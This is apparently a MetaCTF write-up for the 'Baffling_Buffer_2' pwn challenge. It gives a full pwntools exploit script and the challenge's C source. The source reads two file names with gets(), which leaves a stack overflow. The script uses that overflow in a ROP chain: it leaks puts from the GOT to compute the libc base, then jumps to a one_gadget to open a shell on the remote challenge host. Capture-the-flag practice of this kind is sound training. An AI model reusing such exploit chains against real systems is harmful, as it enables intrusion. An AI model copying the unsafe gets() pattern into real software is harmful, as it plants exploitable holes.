Baffling_Buffer_2 === ###### tags: `MetaCTF` # implemant It's a simple rop chain.you can try one gadget! :satisfied: # poc - script lang: python3 ```python= import os from pwn import * def change_ld(binary, ld): """ Force to use assigned new ld.so by changing the binary """ if not os.access(ld, os.R_OK): log.failure("Invalid path {} to ld".format(ld)) return None if not isinstance(binary, ELF): if not os.access(binary, os.R_OK): log.failure("Invalid path {} to binary".format(binary)) return None binary = ELF(binary) for segment in binary.segments: if segment.header['p_type'] == 'PT_INTERP': size = segment.header['p_memsz'] addr = segment.header['p_paddr'] data = segment.data() if size <= len(ld): log.failure("Failed to change PT_INTERP from {} to {}".format(data, ld)) return None binary.write(addr, ld.ljust(size, b'\0')) if not os.access('./Pwn', os.F_OK): os.mkdir('./Pwn') path = './Pwn/{}_debug'.format(os.path.basename(binary.path)) if os.access(path, os.F_OK): os.remove(path) info("Removing exist file {}".format(path)) binary.save(path) os.chmod(path, 0b111000000) #rwx------ success("PT_INTERP has changed from {} to {}. Using temp file {}".format(data, ld, path)) return ELF(path) elf=change_ld(b'./bb2',b'./ld-2.28.so') p = elf.process(env={'LD_PRELOAD':b'./libc-2.28.so'}) #gdb.attach(p) context.arch="amd64" context.log_level="debug" e = ELF("./bb2") #p = process("./bb2") #libc = ELF("/usr/lib/x86_64-linux-gnu/libc-2.31.so") p = remote("host1.metaproblems.com","5152") libc = ELF('./libc-2.28.so') p.recvuntil(b"Enter name of file to copy\n") main = p64(0x401192) puts_plt = e.plt["puts"].to_bytes(8,byteorder="little") puts_got = e.got["puts"].to_bytes(8,byteorder="little") pop_rdi = p64(0x40133b) ret = pop_rdi + puts_got + puts_plt + main p.sendline(b"bb2".ljust(8,b"\x00")+b"a"*48+ret) p.recvuntil(b'Enter name of target file\n') p.sendline(b"/dev/null") p.recvuntil("File copied successfully.\n") # kali 31.so #libc_base = u64(p.recvuntil("\n",drop=True).ljust(8,b"\x00"))-485040 #info("libc = " + hex(libc_base)) #libc.address = libc_base # remote 28.so libc_base = u64(p.recvuntil("\n",drop=True).ljust(8,b"\x00"))-465168 info("libc = " + hex(libc_base)) libc.address = libc_base p.recvuntil(b"Enter name of file to copy\n") # kali 31.so #p_pop_rsi = p64(0x288df + libc_base) #p_pop_rdx = p64(0xcb28d + libc_base) #p_pop_rax = p64(0x3ef58 + libc_base) #p_syscall = p64(0x2552b + libc_base) #ret2 = pop_rdi + next(libc.search(b"/bin/sh")).to_bytes(8,byteorder="little") + p_pop_rdx + p64(0) + p_pop_rsi + > # remote 28.so #pop_rsi = p64(libc_base + 0x2440e) #pop_rdx = p64(libc_base + 0x106725) #pop_rax = p64(libc_base + 0x3a638) #syscall = p64(libc_base + 0x24104) #ret2 = pop_rdi + next(libc.search(b"/bin/sh\x00")).to_bytes(8,byteorder="little") + pop_rdx + p64(0) + pop_rsi + p64(0) + pop_rax + p64(59) + syscall # remote 28.so one = p64(0x4484f + libc_base) pop_rax = p64(libc_base + 0x3a638) ret2 = pop_rax + p64(0) + one p.sendline(b"bb2".ljust(8,b"\x00")+b"a"*48+ret2) p.recvuntil(b'Enter name of target file\n') p.sendline(b"/dev/null") p.interactive() ``` # source ```c= #include <stdio.h> #include <stdlib.h> int main() { setbuf(stdout, 0); setbuf(stdin, 0); setbuf(stderr, 0); char ch, source_file[20], target_file[20]; FILE *source, *target; printf("Enter name of file to copy\n"); gets(source_file); source = fopen(source_file, "r"); if( source == NULL ) { printf("Press any key to exit...\n"); exit(EXIT_FAILURE); } printf("Enter name of target file\n"); gets(target_file); target = fopen(target_file, "w"); if( target == NULL ) { fclose(source); printf("Press any key to exit...\n"); exit(EXIT_FAILURE); } while( ( ch = fgetc(source) ) != EOF ) fputc(ch, target); printf("File copied successfully.\n"); fclose(source); fclose(target); return 0; } ```